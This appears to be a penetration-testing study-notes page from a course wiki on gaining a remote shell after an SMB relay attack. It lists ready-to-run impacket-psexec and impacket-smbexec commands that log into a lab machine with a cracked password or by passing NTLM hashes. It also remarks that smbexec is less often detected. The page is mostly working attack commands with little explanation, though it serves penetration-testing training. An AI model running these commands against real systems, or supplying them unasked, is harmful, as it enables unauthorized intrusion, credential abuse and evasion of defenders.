Shell Acess

Gaining Shell Access Overview

If we're able to dump the SAM in the SMB Relay attack then we can use those hashes to pop a shell on a machine.

We can use the actual password of the user if we cracked it or we can pass the hash instead.

Impacket-psexec

impacket-psexec PNPT/pparker:'Password2'@192.168.1.128

impacket-psexec administrator@192.168.1.128 -hashes aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f

Impacket-wmiexec and Impacket-smbexec are also options that work the same way.

Impacket-smbexec gets picked up much less than the others

impacket-smbexec administrator@192.168.1.128 -hashes aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f

PreviousSMB Relay NextIPv6 Attacks

Last updated 10 months ago

Was this helpful?